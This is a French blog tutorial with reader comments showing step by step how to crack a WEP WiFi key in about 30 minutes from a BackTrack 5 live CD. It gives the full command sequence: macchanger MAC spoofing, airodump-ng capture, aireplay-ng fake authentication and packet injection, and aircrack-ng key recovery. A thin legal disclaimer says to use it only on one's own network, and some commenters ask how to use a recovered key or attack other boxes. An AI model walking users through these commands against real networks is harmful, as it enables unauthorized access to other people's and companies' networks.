WiFi – Cracker une clé WEP en 30 minutes

26

Aujourd’hui, nous vous proposons de découvrir comment cracker un WiFi facilement. Le but de cet article est de démontrer comment il est facile et à la portée de tous… En suivant les étapes ci-dessous, vous pourrez retrouver la clé WEP de votre WiFi en  5 étapes. Facile d’utilisation, tout s’exécute depuis un Live Cd : Pas d’installation de logiciel ou de drivers, rien n’est écrit sur le disque dur de votre machine. Votre machine reste intacte (Windows ou Mac)…

Si votre BOX est sécurisé en WPA/WPA2, allez regarder cet article (Comment cracker un WiFi WPA/WPA2 ?)… Pas sûr que votre WiFi soit si bien sécurisé.

Rappel : Ne piratez pas le WiFi d’une personne ou d’une société (sans son consentement). C’est illégal. Le but de cet article est de démontrer qu’un réseau WiFi (protégé par une clé WEP) est vulnérable. Nous déclinons toute responsabilité !

Nous avons découpé ce Tuto en 5 étapes facile à réaliser.

Etape 1 – Prérequis

Un ordinateur : Vous aurez besoin ordinateur avec WiFi et équipé d’un lecteur de DVD ou port USB de libre. J’ai utilisé un eeePC 901 de 2008 pour ce Tuto. Vous pouvez en prendre un plus récent icon biggrin WiFi   Cracker une clé WEP en 30 minutes

BackTrack 5 (ISO) : BackTrack est une distribution Linux développée par des experts en sécurité et des Pentesters. Cette dernière dispose des meilleurs outils de tests en sécurité.

Un réseau WiFi sécurisé par WEP : Le vôtre icon wink WiFi   Cracker une clé WEP en 30 minutes

  WiFi   Cracker une clé WEP en 30 minutes

Pour rappel, toutes les cartes WiFi ne sont pas forcément reconnues par BackTrack. Il se peut que ce Tuto ne fonctionne pas pour vous.

Etape 2 – Démarrage

Après avoir téléchargé l’image ISO, vous devez la graver. Pour graver une ISO, cherchez rapidement sur Google, ou utilisez UNetbootin pour installer l’image sur une clé USB. Attention, si vous utilisez un Mac, vous devez absolument passer par un CD/DVD ou utiliser rEFIt.

Une fois l’image gravée, vous devez démarrer sur le CD ou la clé USB. Sur certains ordinateurs c’est la touche Ech, d’autres la touche F12, etc. Pour Mac, il s’agit de la touche Option. Reportez-vous à la documentation de votre ordinateur ou de son BIOS.

Une fois la touche trouvée et le disque (ou clé) choisis, vous devriez avoir cet affichage à l’écran

BackTrack Live CD WiFi   Cracker une clé WEP en 30 minutes

Appuyez sur la touche Entrée ou attendez que le décompte soit terminé.

startx WiFi   Cracker une clé WEP en 30 minutes

A l’invite, tapez :

startx

Par défaut, le clavier est en QWERTY,  le a s’obtient avec la touche q

Etape 3 – Cible WiFi

Tout d’abord, nous allons identifier votre carte WiFi. Ouvrez une console (icône à coté du menu System en haut). Tapez la ligne suivante :

airmon-ng
airmon ng WiFi   Cracker une clé WEP en 30 minutes
Notre carte WiFi se nomme wlan0

note : Si vous souhaitez passer en AZERTY, tapez la commande suivante :

setxkbmap fr

En QWERTY pour obtenir le m appuyez la touche , et pour le a s’obtient avec le q

Maintenant, nous allons changer notre adresse MAC (Identifiant unique d’une carte réseau).

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

Lorsque vous avez un terme entre parenthèse, vous devez indiquer votre valeur.
change adresse mac WiFi   Cracker une clé WEP en 30 minutes
Maintenant, trouvons la cible (votre box)…

airodump-ng (interface)

airodump WiFi   Cracker une clé WEP en 30 minutes

Appuyez sur Ctrl+c pour sortir.

Etape 3 – Ecoute

Sélectionnez le BSSID en blanc ci-dessus et tapez la ligne suivante :

airodump-ng -c (n°canal) -w (nom de fichier) --bssid (BSSID) (interface)

airodump BSSID WiFi   Cracker une clé WEP en 30 minutes

Maintenant, on attend le trafic. Oui, pour cracker un réseau WiFi sécurisé d’une clé WEP, il faut du flux entre un ordinateur/tablette/smartphone et la Box. Les colonnes Beacons et #Data vont augmenter rapidement. Oubliez la première, elle ne nous intéresse pas. C’est la seconde qui est importante.

Etape 4 – Trafic

Comme il s’agit de votre réseau WiFi, vous pouvez générer votre propre trafic avec votre smartphone. Consultation Facebook (environ 500 Data), regardez une vidéo sur YouTube (fonction de la vidéo min 1000). Si vous n’avez pas d’autres périphériques à connecter à votre box, vous pouvez utiliser aireplay-ng. Ce dernier permet d’écouter et d’injecter des paquets dans un réseau. Ouvrez une deuxième console et tapez cette ligne.

aireplay-ng -1 0-a (BSSID) -h 00:11:22:33:44:55 -e (ESSID) (interface)

authentification fake WiFi   Cracker une clé WEP en 30 minutes

Attendez le petit smiley pour vous signaler que la fonction Fake authentication est OK. Tapez la ligne suivante pour générer du flux :

aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 (interface)

Ça commence doucement puis ça s’accélère…

aireplay ng WiFi   Cracker une clé WEP en 30 minutes

Tant que votre colonne #Data de la commande airodump-ng -c de la section Ecoute n’a pas atteint 20.000 (voir 30.000), il y a peu de chance d’arriver à trouver le code de sécurité WEP.

Etape 5 – Crack

Une fois que vous avez atteint le bon nombre, vous pouvez faire un Ctrl+c et tapez la ligne suivante :

aircrack-ng -b (BSSID) (nomdufichier-01.cap)

Et maintenant on patiente… Et voici le résultat :

cle web trouvee WiFi   Cracker une clé WEP en 30 minutes

Conclusion

Le but de cet article est bien de démontrer qu’il est très facile de cracker un WiFi sécurisé d’une clé WEP. Ici, le test ne m’a pris que 30 minutes.

Le gros avantage ici, c’est que nous utilisons un live-CD qui vous évitera d’installer des applications et/ou drivers sur votre machine. Tout s’exécute en mémoire. Rien n’est écrit sur le disque dur de votre machine.

De nos jours, les réseaux WiFi protégés par une clé WEP sont rares (heureusement). Nous vous rappelons qu’il est illégal de tenter et/ou réussir à pénétrer un réseau sur lequel vous n’êtes pas autorisé à entrer.

Partager.
  • tratra

    fonctionne sous windows ou pas?

    • http://www.cachem.fr/ Fx

      Tu graves l’image ISO sous Windows et tu redémarres ton ordinateur sur le disque fraîchement gravé :D

    • Atom

      Quand je vois ce genre de question , je me dis que la seule chose que tu risques de craquer c’est ton slip :)

  • rosiana monbon

    Salut ! Je viens de trouver votre blog, il est intéressant !!

    Voyance gratuitement

  • Djerfy

    Et encore, avec les anciennes BBOX, c’est en seulement 1 minutes….. :)

  • ana

    Ca ne fonctionne pas depuis un live CD sur un Mac book (blanc) ?
    le airodump-ng tourne ds le vide…. help me !

  • rodrigo

    c’est quoi l’image ISO ???

    • http://www.facebook.com/LeopauldButters Alexis Suerte Courtin

      Une image iso est une copie conforme d’un CD DVD, en gros tu as juste a le graver et tu auras le même CD DVD

  • qwerty

    Merci pour la tuto :)
    Mais est ce que le fait de changer IP MAC peut causer des problemes pour la carte WIFi ?

  • Frackup

    Bonjour,

    Merci beaucoup pour ce tuto super clair, cependant je n’arrive pas à tester cette méthode.
    Je m’explique, j’ai utiliser le soft UnetBootin pour « graver » l’ISO sur une clé USB fraichement formatée (en NTFS), et quand je tente de booter depuis ma clé -> Erreur : BootMGR absent (avant j’avais une autre erreur qui me disait qu’il manquait un OS pour booter et qu’il fallait déconnecter tous les lecteurs n’ayant pas d’OS, un truc du genre ;) ).

    Voilà, si vous avez une solution, sinon je tenterai de graver un CD (je n’en avais pas sous la main).

    • Frackup

      Bon je me réponds si ça peut aider quelqu’un, car j’ai réussi à débloquer mon problème.

      En fait j’ai reformaté ma clé en FAT32 (elle était en NTFS) et réinstaller l’ISO avec UnetBootin.

      Le boot a alors correctement fonctionné.

      Ce qui est étrange c’est que je n’ai rien trouvé sur les forums à ce sujet (FAT32 vs NTFS).

  • Populos14

    Bonjour et tout d’abord, merci pour ce tuto.
    Chez moi ça ne marche pas. Pour la dernière étape je n’ai pas « Key found » mais « Failed. Next try with 5000 IVs. » Qu’est-ce que ça signifie ? J’ai réessayé deux fois et à chaques fois je dépassait les 50000 de #data. Ma box est-elle protégé contre ce genre de trucs ? Dois-je me réjouir ?

    • Joe

      NON, elle n’est pas plus protégé si elle est en WEP. Il te faut un maximum IV

  • wyssem

    Comment faire si ma carte reseau ne saffiche pas ?

  • angelo

    Mon probleme est simple en fait j obtiens la clef tout bon en quelques minutes sauf que je ne sais pas comment l exploiter tel quel !!

    • jojo

      ???

  • ys

    Je bloque au démarage quelqu’un peut m’éclairer?

    j’ai installer bt5 R3 sur ma clé usb mais je sais pas comment demarer le tout :(

    • ys

      désolé du double post

      • jeanjean

        Une fois l’image gravée, vous devez démarrer sur le CD ou la clé USB. Au redémarrage de l’ordinateur, il faut appuyer soit sur la touche Ech, ou F12, c’est en fonction de l’ordinateur

  • Kama

    je n’arrive pas à démarrer, car je ne sais pas la touche que je dois faire. J’utilise windows. :( de l’aide svp

  • Eric

    Bonjour
    Comment utiliser la clé trouvé qui est en décimal ?
    Merci

    • N

      1.c’est pas du décimal c’est de l’hexadécimal
      2. tu dois la convertir en ASCII

  • JoJo

    Bonjour,

    Super tuto, mais après l’avoir suivi à la lettre, j’ai une erreur en saisissant la dernère ligne de code : aircrack-ng -b (BSSID) (nomdufichier-01.cap)

    Apparement une network error, on me dit de vérifier le bssid. Or je rentre le même bssid que celui utilisé lors de toutes les étapes antérieures…

    Une idée ?
    Merci d’avance.

  • dragon

    bonjour j’ai installé refit sur mon mac mais je n’arrive pas à redémarrer sur le le dvd où j’ai mis BT5 quelle et la marche à suivre si j’ai installé refit ?

  • Icefrost

    Bonjour, voila j’ai un problème. Je n’arrive pas a booter ma clé usb. Quand je redémarre l’ordi et que j’appuie sur echap au demarrage et que je choisi ma clé, il m’affiche une fenetre ou il y a un decompte qui une fois a 0 recommence. Et quand j’appuie sur TAB, m’écris /ubnkern initrd=/ubninit .
    Merci de ton aide

    Ps : je suis sous windows8

  • giusepo

    Oui mais quand c’est une livebox avec l’association on fait comment ?

Lire les articles précédents :
Edito du 13 août

Salut les Geeks, J'espère que vous allez bien et que vous profitez bien de cette période estivale. Ma semaine de...

Fermer